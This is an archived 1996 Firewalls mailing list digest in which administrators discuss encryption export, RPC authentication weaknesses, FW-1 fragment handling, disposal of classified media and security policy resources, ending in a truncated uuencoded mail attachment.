(8.7.1-lists/Lists-951222-1) id SAA18475 for firewalls-outgoing; Thu, 11 Jan 1996 18:55:45 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18438 for ; Thu, 11 Jan 1996 18:55:35 -0800 (PST) Received: from pferguso-pc.cisco.com (c3robo6.cisco.com [171.68.13.48]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id SAA08629; Thu, 11 Jan 1996 18:54:06 -0800 Message-Id: <199601120254.SAA08629@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 21:54:37 -0500 To: "Archer, Barry J." From: Paul Ferguson Subject: Re: Encryption export laws from US... Cc: "'Firewalls Digest'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was merely observing that, while the topic of encryption may or may not be wholly relevant to firewalls, the cypherpunks list is one of the few mailing lists dedicated to this topic. There is also sci.crypt, but USENET is another topic altogether. -paul ps. thanks for the kind words. ,-) At 09:21 AM 1/11/96 PST, Archer, Barry J. wrote: > > *Very* rare for me to see anything from Paul Ferguson that I disagree >with, but I think this thread is very applicable to firewall discussions. > One of the major can'o'worms I face is how to set up secure USER to >Firewall sessions over the Internet. It's not a matter of whether or not I >like it, it's coming. > > Firewall to Firewall encryption is great, but when you have nomadic >remote users and small international offices individual access gets >important for a lot of folks. Plus, some countries now seem to have more >reliable Internet access than private voice/data line access...which is >actually what prompted the first inquiry I got for 'why can't I..." > > My nightmare is a different solution for each and every country... > > Barry Archer > archerbj@bv.com > > "These opinions are mine, Mine, MINE!" - me > "Who cares?" - my cat > >>From: Paul Ferguson >>Date: Wed, 10 Jan 1996 21:23:26 -0500 >>Subject: Re: Encryption export laws from US.. >> >>You may want to redirect this request to the cypherpunks mailing >>list instead, where you have a more on-topic >>audience. >> >>- - paul > > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Jan 11 19:38:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA18849 for firewalls-outgoing; Thu, 11 Jan 1996 19:22:02 -0800 (PST) Received: from locon.mtnlake.com (locon.mtnlake.com [165.154.24.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA18844 for ; Thu, 11 Jan 1996 19:21:55 -0800 (PST) Received: from unknown by locon.mtnlake.com with smtp (Smail3.1.29.1 #1) id m0taVH4-000E0AC; Thu, 11 Jan 96 22:15 From: heuman@mtnlake.com (R.S. (Bob) Heuman) To: "A. Padgett Peterson, P.E. Information Security" Cc: firewalls@greatcircle.com Subject: Re: "Please reply to Email address and not to the list" Date: Thu, 11 Jan 1996 22:20:22 -0500 Reply-To: heuman@mtnlake.com Message-Id: <30f5d148.11554455@mailserv.mtnlake.com> References: <960111090536.20200f9e@hobbes.orl.mmc.com> In-Reply-To: <960111090536.20200f9e@hobbes.orl.mmc.com> X-Mailer: Forte Agent .99d/32.168 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996 9:05:36 -0500 (EST), you wrote: >>I would appreciate it if you can take a moment to respond to my email address >>(not the whole list) to "vote" on if you think SNMP traffic should pass through >>a Firewall. > >Is hard to do if the E-mail address is not in the body of the message and >your E-Mail system does not preserve headers. PLEASE, if you want a direct >reply, end the message with a name and E-mail address. > > Warmly, > Padgett Padgett, also note that sometimes the messages bounce back since the address used and therefore pickup up for the reply is not the address recognised for responses. I see a lot of university addresses where a specific machine id is added to the sender's address, yet needs to be stripped out of the reply address or the mail is returned undeliverable. I agree - put your address(es) at the end of the message if you want a response... Bob From firewalls-owner Thu Jan 11 21:02:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA21029 for firewalls-outgoing; Thu, 11 Jan 1996 20:51:18 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA21022 for ; Thu, 11 Jan 1996 20:51:14 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id XAA21054 for ; Thu, 11 Jan 1996 23:50:14 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id XAA13122; Thu, 11 Jan 1996 23:50:10 -0500 (EST) Date: Thu, 11 Jan 1996 23:50:08 -0500 (EST) From: "Paul D. Robertson" To: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Brain21 wrote: > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > email (3 complete overwrites with random data if I recall correctly) and then > > I thought that the NSA could read approx. 7 writes deep. If thought that > you just put bullets in those drives (quite literally) instead of > rewriting them. > I'm sure someone who has a better memory will correct me, but I think three or five complete overwrites used to be approved for up to secret (no longer approved, and may have acutally been for up to top secret, memory fades). Bullets are not an approved destruction method (nor is eating, I recall looking that up once to answer a bet), and never have been, to the best of my knowlege. We always used to require physical destruction, as I remember it, for anything above SBU. Course, I could be remembering wrongly, because if I think too hard about those days, I'll have to kill me.... If anyone's around in May of 2053, and I'm not senile, I'll have some cool stories :) Back before I entered the world of real classified, we had a big green sledgehammer with which to destroy our secret wartime data that resided on 2314 diskpacks. The BFGSH (Big _____ Green Sledge Hammer), correctly weilded was I would suppose approved for emergency destruction only. I don't think they trusted us with too many thermite grenades :( Paul "What PROFS note?" Robertson ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Thu Jan 11 21:14:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA21444 for firewalls-outgoing; Thu, 11 Jan 1996 20:58:58 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA21439 for ; Thu, 11 Jan 1996 20:58:51 -0800 (PST) Message-Id: <199601120458.UAA21439@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA131152694; Fri, 12 Jan 1996 15:58:14 +1100 From: Darren Reed Subject: Re: Firewalls-Digest V5 #14 To: murrell@bctel.net (Brian Murrell) Date: Fri, 12 Jan 1996 15:58:14 +1100 (EDT) Cc: Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com In-Reply-To: <199601111705.JAA18920@mocha.bctel.net> from "Brian Murrell" at Jan 11, 96 09:05:29 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk RPC (Remote Procedure Call) on all systems except those with NIS+ (ie Solaris 2) typically use "Unix" authentication, if any. The classic examples of this are NFS and rexd. Solaris 2 now supports credentials held using DES with public/private keys of 192 (or thereabouts) bits in size, but if you want to change your NIS+ password and have a number of replicas > 0, you MUST turn OFF using DES credentials - ie you remove security to perform a secure operation. AFAIK, few programs, and mostly only those with Solaris2 use or require DES credentials. What's more worrying is RPC programs written which have other goals in mind, but allow some sort of shell access, based on "Unix" authentication... RPC services register themselves through a service daemon (portmapper) which allocates them a UDP/TCP port and records details about the service occupying that port. Usually you ask the portmapper for details about where to find a service, but this can be avoided. Even though it is possible to put access control on the portmapper, this doesn't stop people talking directly to RPC daemons, which can be configured through inetd or on their own, making it hard to setup an access policy. The RPC model is a good one, but this implementation is lacking. On a similar note, does anyone allow DCE/DFS thought a firewall, or have any comments about its usefulness in such an environment ? darren From firewalls-owner Thu Jan 11 21:29:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA21984 for firewalls-outgoing; Thu, 11 Jan 1996 21:08:12 -0800 (PST) Received: from hal-pc.org (hal-pc.org [204.52.135.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA21959 for ; Thu, 11 Jan 1996 21:08:04 -0800 (PST) Received: from pm0-43.hal-pc.org (pm0-43.hal-pc.org [206.66.129.43]) by hal-pc.org (8.6.11/8.6.9) with SMTP id XAA02365; Thu, 11 Jan 1996 23:06:35 -0600 Message-Id: <199601120506.XAA02365@hal-pc.org> Comments: Authenticated sender is From: "robertp@hal-pc.org" To: Andrew Cameron , Robert Hart Date: Thu, 11 Jan 1996 23:01:48 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Internet Policy/Security Policy CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Wed, 10 Jan 1996, Andrew Cameron wrote: > > > > > I would like to know where I can find examples of an Internet/Security > > Policy for a company. > > > > I will need to write one in the near future and would like to draw on > > the experiance of others. > > Well, I have found the O'Reilly book "Building Internet Firewalls" > chapter on this quite useful as I have been drafting up a policy for here... > > --- > Robert Hart hartr@hedunx.hedland.edu.au > Voice: +61 (0)91 72 0429 Fax: +61 (0)91 72 3560 > Hedland College, PMB 1, South Hedland WA 6722 Australia > I would recommend that you Review RFC 1244 - Site Security Handbook, NIST Special Publication 800-10, Draft IETF-SSH-Handbook-00 - Site Security Handbook for System and Network Administrators an Internet Draft from the Network Working Group SEI/CMU and possibly RFC 1636 - Report of IAB Workshop on Security in the Internet Architecture. While not specifically germain to firewalls, another question I have is, can a "sign-on banner" take the place of a signed "User Responsibility Statement?" The scenario would be, when a person signs on a system, his start-up banner would state that by signing on he/she signifies they have previously read and understood all applicable security policies and procedures regarding accessing the Internet via company XXX's systems and have agreed to abide by them." (or similar words). The logic is to do away with the logistics and manpower necessary to have all (a large number)of employees sign an actual user responsibility statement. Any comments greatfully accepted Bob Plaumann robertp@hal-pc.org Logic is to try and get away from From firewalls-owner Thu Jan 11 21:48:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA23584 for firewalls-outgoing; Thu, 11 Jan 1996 21:35:17 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA23577 for ; Thu, 11 Jan 1996 21:35:11 -0800 (PST) Message-Id: <199601120535.VAA23577@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA145124868; Fri, 12 Jan 1996 16:34:28 +1100 From: Darren Reed Subject: Re: Firewalls-Digest V5 #14 To: mjr@switchblade.v-one.com Date: Fri, 12 Jan 1996 16:34:27 +1100 (EDT) Cc: murrell@bctel.net, Firewalls@GreatCircle.COM In-Reply-To: <199601111913.OAA13809@switchblade.v-one.com> from "Marcus J. Ranum" at Jan 11, 96 02:13:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Marcus J. Ranum, sie said: [...] > The argument of "application level" versus "smart packet > filtering" or "dynamic screening" or whatever it's being called > this week is a really silly one. The question is: DOES THE THING > DO WHAT IT HAS TO DO? Classical application level proxies are > an implementation detail based on the ease with which one can > take advantage of the kernel's state-maintenance for TCP sessions, > and the fact that it is easier to write application code than > kernel code, if you haven't got a kernel source license. That's > it. > > Where things get interesting is when the smart packet > filters get to the point where they can perform very detailed > checks (checks which, typically, are easier to do in application > code than kernel code) if those are what is required. I see a > lot of firewalls that use plug-gw all over the place. As far > as I am concerned, plug-gw is axiomatically equal to allowing > a hole through a router. The firewall is a no-op except for > the audit trail. Therefore, a router with a hole, and a sniffer > with a log are equal to the firewall in that case (only faster). [...] Something else which *really* bothers me about FW-1 is fragments and reassembly. If FW-1 is performing reassmelby, it is no longer a packet filter/screen. What I find rather bemusing about their advertising crap for V2.0 is the claim it does away with fragments. That is simply not possible unless it forces path MTU discovery to be used and otherwise rejects all fragments. The latter is probably a good thing anyway (and I'd *strongly* recommend it to everyone given the trouble fragments have caused packet filters in the last 12 months), but as it isn't an end-point for any communications, I'm *sure* there are going to be situations where FW-1 can be made to let a packet through based on incorrect reassembly. At least using plug-gw, everything is put back into shape before being shipped on up to the proxy which does the relaying, etc. Doing things like rewriting packets (as does ipfw in linux) as part of its IP masquerading, for FTP, is another one of those "dangerous" things, looking for trouble. darren From firewalls-owner Thu Jan 11 22:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA25334 for firewalls-outgoing; Thu, 11 Jan 1996 22:02:06 -0800 (PST) Received: from border.dreamworks.com (dreamworks.com [204.250.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA25316 for ; Thu, 11 Jan 1996 22:02:01 -0800 (PST) Received: from border.dreamworks.com (daemon@localhost) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id VAA26634 for ; Thu, 11 Jan 1996 21:48:01 -0800 Received: from gateway (gateway.dreamworks.com [10.1.1.2]) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id VAA26630 for ; Thu, 11 Jan 1996 21:48:01 -0800 Received: from juice.dreamworks.com by gateway (SMI-8.6/SMI-SVR4) id WAA29051; Thu, 11 Jan 1996 22:00:45 -0800 Received: by juice.dreamworks.com (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id WAA06595; Thu, 11 Jan 1996 22:03:39 -0800 From: "Alan C.Horn" Message-Id: <9601112203.ZM6593@juice.dreamworks.com> Date: Thu, 11 Jan 1996 22:03:37 -0800 X-Mailer: Z-Mail (3.2.2 10apr95 MediaMail) To: firewalls@greatcircle.com Subject: Re: Encryption export laws from US... Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --- Forwarded mail from Paul Ferguson I was merely observing that, while the topic of encryption may or may not be wholly relevant to firewalls, the cypherpunks list is one of the few mailing lists dedicated to this topic. There is also sci.crypt, but USENET is another topic altogether. -paul ps. thanks for the kind words. ,-) --- I'm not a cypherpunk, so I wouldn't be following that list. I am however a computer professional tasked with setting up secure communications of source code running a parallel RCS system between two firewalls in different countries. My personal response to my employer was 'DAT tape and federal express sounds like a pretty good solution', however they want to go all high tech on me :) So I asked the question on the one list that I have always received good information from in the past. Perhaps I should have mentioned the word 'firewall' in my initial question, would that have been more clear ? :) ObRelevantBit : Incidentally, I received several very helpful replies from people, many thanks to all concerned. Thanks Al -- Alan Horn - Computer Support and Sysadmin - Dreamworks SKG. (+1 818 733 6000) GAT d? H++ s+:+ !g p1 !au a- w- v++ C++ ULI++++ P+++ L++ 3 E- N++ K W-- M- V-- po Y+ t 5 !j R G tv b+++ D+(++) B? e- u** h f++ r++ n+ y+ [Personal Email : deorth@mono.org] [Work Email : ahorn@dreamworks.com] From firewalls-owner Thu Jan 11 22:44:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA26788 for firewalls-outgoing; Thu, 11 Jan 1996 22:32:27 -0800 (PST) Received: from archimedes.vislab.navy.mil (archimedes.chinalake.navy.mil [129.131.31.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA26783 for ; Thu, 11 Jan 1996 22:32:23 -0800 (PST) Received: from archimedes.vislab.navy.mil (parcival.vislab.navy.mil [129.131.31.12]) by archimedes.vislab.navy.mil (current-1701B/current-CL-CL) with ESMTP id WAA24634; Thu, 11 Jan 1996 22:33:04 -0800 Posted-Date: Thu, 11 Jan 1996 22:33:04 -0800 Message-Id: <199601120633.WAA24634@archimedes.vislab.navy.mil> To: "Paul D. Robertson" cc: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-reply-to: Your message of "Thu, 11 Jan 1996 23:50:08 EST." Date: Thu, 11 Jan 1996 22:32:55 -0800 From: Benjamin Allan Smith Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message you wrote: > > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > email (3 complete overwrites with random data if I recall correctly) and > > > > I thought that the NSA could read approx. 7 writes deep. If thought that > > you just put bullets in those drives (quite literally) instead of > > rewriting them. > > > > I'm sure someone who has a better memory will correct me, but I think > three or five complete overwrites used to be approved for up to secret > (no longer approved, and may have acutally been for up to top secret, > memory fades). I couldn't quickly find the specs, but in the case that I mentioned we were reusing the disks and had to verify every copy of the data had been erased. Physical security of the disks was maintained so they were reused. It seems to me that it would be impossible for a cracker to read N writes ago without physical access to the disk *and* special equipment. (Isn't the technique X-ray crystalography to read N write ago?) If memory serves, megnetic media that have had Secret data on them may be declassified after 10 writes. Magnetic media with Top Secret and higher may never be declassified and must be destroyed by phyiscally destroying the media (shreading) and incinerating the pieces. (Ironically I was able to easily find "Destruction of Equipment [Land Rover] to Prevent Enemy Use" which is USER HANDBOOK, Truck, Utility, 3/4 Ton, 4 X 4 (Military 109) Pub. 3/82, Section V, Par 402 to 411) :) Ben ------------------------------------------------------------------------------- Benjamin Smith------------bens@vislab.navy.mil---------1972 Land Rover SIII 88 Science Applications International Corporation Naval Air Warfare Center, Weapons Division, China Lake "...If I were running such a contest, I would specifically eliminate any entry from Ben involving driving the [Land] Rover anywhere. He'd drive it up the Amazon basin for a half can of Jolt and a stale cookie..." --Kevin Archie From firewalls-owner Thu Jan 11 22:59:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA28683 for firewalls-outgoing; Thu, 11 Jan 1996 22:54:58 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA28678 for ; Thu, 11 Jan 1996 22:54:53 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id BAA21902; Fri, 12 Jan 1996 01:52:51 -0500 Date: Fri, 12 Jan 1996 01:52:51 -0500 (EST) From: Brain21 To: Jim Meritt cc: firewalls@GreatCircle.COM, Benjamin Allan Smith Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: <9600118213.AA821396873@smtpinet.aspensys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Jim Meritt wrote: > Concur. DISNET yes. Internet no. > > Unless maybe you/he WANT him arrested.... > > Or maybe he was just spinning a tale and you fell for it. Or maybe he > just didn't understand how it was working. 1) I was NOT spinning a tale 2) I DON'T want my father arrested (for WHAT? Pray tell?) 3) I never mentioned that classified info was sent over the net. Read more carefully before making assumptions. As I stated in my follow-ups (which really should not have even been necessary. C'mon some of you assume and inferr WAY too much!!!!) I said that he had top secret clearance. I said that the company that he worked for (a DoD subcontractor) kept in touch w/ it's other offices over the net. I said that they did not use encryption. I inferred that netcom was not secure. I said that I was not allowed to know his email address (company policy) (that's why I got him one plus a butload of software for Christmas a year ago). Now, please show me where I stated that he or his company did, in fact, send ANY classified documents over the net! Guess what? You can't! Cause I never said that! You just assumed that that was what I meant. I said in follow-up posts that it was, in fact, possible for someone to perhaps mention something by accident (BTW, I never said that that did happen, I just mentioned that the possibility was there) just like that OTHER poster had mentioned. I alluded to the fact that *I* thought that the mere possibility of someone inadvertantly saying something was there, and that I thought that in and of itself was insecure. I thought that they should have had NO net connection, at least in the capacity that they did have it. My point was that security is NOT the first thing on everyone's mind, even when it sometimes should be. Now, take these posts and try to get him arrested. Let me know when the lawyers stop laughing at the evidence that you present because it is comprised purely of assumptions and conjecture (and any other redundancies that you can think of). I don't mean for these comments to sound snied, but c'mon. Get real, and stop interpreting what you THINK someone said, especially when you say such inane things as "unless yoou/he WANT him arrested"!!!! Sorry about the bandwidth on this one. I consider this issue dead because of what it has become, and how many completely missed my point to begin with (though not all). Chuckling in amazement, Brain21 From firewalls-owner Thu Jan 11 23:29:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA01047 for firewalls-outgoing; Thu, 11 Jan 1996 23:22:00 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id XAA01035 for ; Thu, 11 Jan 1996 23:21:55 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id RAA27733; Fri, 12 Jan 1996 17:50:50 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA19380; Fri, 12 Jan 1996 17:50:47 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <9601120720.AA19380@bunya.awadi> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: bens@archimedes.vislab.navy.mil (Benjamin Allan Smith) Date: Fri, 12 Jan 1996 17:50:48 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199601120633.WAA24634@archimedes.vislab.navy.mil> from "Benjamin Allan Smith" at Jan 11, 96 10:32:55 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Benjamin Allan Smith: > > If memory serves, megnetic media that have had Secret data on them >may be declassified after 10 writes. Magnetic media with Top Secret and >higher may never be declassified and must be destroyed by phyiscally >destroying the media (shreading) and incinerating the pieces. > if there was a firewalls FAQ this one should definitely be in it. The correct answer is, apparently, it depends. It seems in the US that the the DOD will allow the defence organisations to declassify and dispose of disks which have had data lower than a certain level stored on them (I think Secret is about right). The rules for a Defence contractor are different - any media with any sort of classified data on it must be destroyed after it is no longer required. Here in Australia, I know for sure that it is the same for defence contractors - I am the ISSO so I am supposed to know about such things... > (Ironically I was able to easily find "Destruction of Equipment [Land >Rover] to Prevent Enemy Use" which is USER HANDBOOK, Truck, Utility, 3/4 Ton, >4 X 4 (Military 109) Pub. 3/82, Section V, Par 402 to 411) :) > I saw a section about changing the tyre on a military vehicle, the amount of detail and instruction in it was very very disturbing.... -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Thu Jan 11 23:50:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA01839 for firewalls-outgoing; Thu, 11 Jan 1996 23:32:29 -0800 (PST) Received: from ccigate.cci.de (ccigate.cci.de [193.103.165.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA01817 for ; Thu, 11 Jan 1996 23:32:13 -0800 (PST) Received: by ccigate.cci.de (4.1/04-otm) id AA12187; Fri Jan 12 08:36:26 1996 Received: from thor.cci.de(194.173.165.240) by ccigate.cci.de via smap (V1.3) id sma012185; Fri Jan 12 08:36:08 1996 Received: from luis.cci.de by thor.cci.de (4.1/VS-1.8) id AA02153; Fri, 12 Jan 96 08:29:51 +0100 Received: from LUIS/SpoolDir by luis.cci.de (Mercury 1.21); 12 Jan 96 08:33:45 +0100 Received: from SpoolDir by LUIS (Mercury 1.21); 12 Jan 96 08:33:21 +0100 From: "Erwin Schuermann" Organization: Competence Center Informatik GmbH To: Owen Davis Date: Fri, 12 Jan 1996 08:33:19 +0100 Subject: Re: NT Fire Wall Reply-To: schuerma@cci.de Cc: Firewalls@GreatCircle.com X-Mailer: Pegasus Mail for Windows (v2.23) Message-Id: <2245B60234A@luis.cci.de> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Owen Davis > Subject: NT Fire Wall > To: Firewalls@GreatCircle.com > Date: Thu, 11 Jan 1996 11:39:26 -0500 (EST) > Hi, > > I, like many others, am giving NT a shot for some of my networking needs. Do you know of an excellent NT Firewall ? > > Thank you much in advance. > > Owen Davis > Try http://www.network-1.com/n1 for a fully functional copy of Firewall/Plus for NT. You can test it for two weeks Erwin Schuermann ------x \|#|/ o - -------------------------ooO( * )Ooo-------------------------------- Erwin Schuermann '~' Competence Center Informatik GmbH E-Mail : schuerma@cci.de Abt. IT-Sicherheit tel : (+49)5931-805 226 Lohberg 10 fax(personal) : (+49)5931-842 226 49716 Meppen, Germany fax(reception): (+49)5931-805 100 Visit our Homepage: http://www.cci.de/ "Murphy's Law always occurs at the wrong moment" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Thu Jan 11 23:59:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA03760 for firewalls-outgoing; Thu, 11 Jan 1996 23:55:43 -0800 (PST) Received: from sc2 (sc2.cais.com [205.252.26.151]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA03745; Thu, 11 Jan 1996 23:55:35 -0800 (PST) Received: by sc2 with Microsoft Mail id <01BAE099.1468CAA0@sc2>; Fri, 12 Jan 1996 02:52:58 -0500 Message-ID: From: "Sudduth, Larry" To: "'Debbie Driesman'" , "firewalls-digest@GreatCircle.COM" , "Firewalls@GreatCircle.COM" Subject: RE: Firewalls-Digest V5 #2 Date: Fri, 12 Jan 1996 02:52:30 -0500 X-MS-Attachment: WINMAIL.DAT 0 00-00-1980 00:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Debbie Driesman wrote January 11, 1996 8:22 AM >Where can I get more information on PNS? I've tried a number of the web >search tools and they didn't find anything. >> responding to A. Padgett Peterson's message Tue, 2 Jan 1996 14:02:49 -0500 >>2) Sounds like you have dedicated lines. Have you considered requiring PNS >> (Protected Network Service) from the telco ? (May have a different name >> but should be available). With this your lines are isolated/protected >> from other trunks. A dedicated line is not at the same risk as the Internet >> and PNS is generally "good enough" for SBU (Sensitive but Unclassified) >> traffic. > >> When the idea was introduced a couple of years ago, it was to be >> approved by the NSA and was a part of the FTS contract. Dunno where it >> is now. Protected Network Services, telecommunications systems approved by NSA for the plain-text transmission of Sensitive but Unclassified U. S. Government information of U. S. Government Departments and Agencies, and their offerors, are described in the semi-annual NSA publication, "Information Systems Security Products and Services Catalogue." Previously the PNS sobriquet described carrier-guaranteed "copper-only" long haul transport (e.g., no microwave relay). Such protection was effective against foreign ELINT threats, but not much else. The focus of the PNS "program" and the number of offerors has significantly expanded in the last several years. Samples of the INFOSEC Catalogue can perhaps be cadged from NSA, Attn.: V211, 9800 Savage Road, Ft. Meade, MD 20755-6000. The GPO sells the catalogue singly and by subscription (two issues plus two supplements equals quarterly); call them at (202) 512-1800. -=-=-=-=-=-=-=-=-=-=-=-=-= SudduthLM@SecureC2.com begin 600 WINMAIL.DAT M>)\^(CL'`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$%@ ,` M#@```,P'`0`,``(`- `>``4`.0$!"8 !`"$```!&-#!&1#8T.3=&-#E#1C$Q M.$$P,# P-C X0S8X13)S=&5M`H,SMP+D!Q,"@S02S!3(-0/& M713%?0J ",\)V3L8SS(\-34"@ J!#;$+8&YG&#$P,Q10"P-L:3$$.# "T6DM M,30T7PWP#- =,PM5%6(R$K!CR0! (#X+2C$V"J #8(43T&,%0$1E8F((D#L@ M@ B!\>\"!WKR B"N$?3R!22@!P=0K ('D@,3$L)0`Y.; V(#@Z'J 4 ML$T*B_DZA;R# $@%BQ7: 20(.!C`Y%)('IG$< @!& J$0N `A!R M*0# =&D"(" KP5!.1%,_(J!))W8@X'3A"(%D(&$@)+ &T 20_2O@9BS *? B ML""@"H2WP^0N 9RX*CR\L)A\G+Q[BY#X@&-!S< (@,N ;T",3T&P% MH" L4"A-_F$D\$7#+3 RX W0*@$",'TM0&$'@$D_2D]+7TQ18NIU,6%H"&!L M+1 M@"T@/G8+< M@`F!.(#L`5VG_+? MX00`17(%P$:S+2 K`O<[\ M@1G$O M(!4M`5$/4A]_4R],44Y3(# I\2S!1.!K_4;Q048-5X$M0" P+2 %0+\M\CVP M!X XD 0`3:!A!"#]+?))`C $D1' 6,]9WUKOOTQ1,E(L(5Y2*J!&T'('0/)L M)/ B9S(`+1 )\ A@&&=H(C- !;%30E4_3( &8 "!*Z LH51B56[>8PM@!! & MD"SQ*6#?8>]W8O],42S080W01D T)C[_:*]IOVK/3%$IX0.@+?)'\;TM,'=? MX0N +- $<'5.$+LM$@6@=0M0(. MP7DQD?\R,660)3!6$'$S.5%5$6T/]VX? M;R]D`G @$2R@5/$D\/\M\BPP75 R4G%"+3 T805 ^2W%1E0%\$>Q; $@8#L` M_D1$X%Z0(K I\U80=']UC_=VGTQ17F-W-"PV_R7!-#]W?0Q,KTVV;43@1D(KL00@ 4)$K.RW0C%\@D'FRC1+U,C1!9.%C(2$E M,#)52*#_+;%0406PD-(J$0VP!/(M@/\M$ N 7O03X!T0`' DL0,@N7C2<'4" M8(9E)3 B8%#7*U@3I 9"8PAQ="3PA %G<=&/]84F($,KD = ;]IG"E N9D"# M\65-\ A@WG-E42WR9'([\&(%$$B URJQDH@J0'((@BV9``K ]P!P$] M`2(% MH'?@G#$"(/]E4&9 && Y(1& 5-")E#C0_7G1*)D@-! E,'N!B? %`.]_T$72 M&- +8'E5T08`<>!_,= @%2NR<4(-P:&23])G+PMQ$\!F4I%@9P.@14SX24Y4 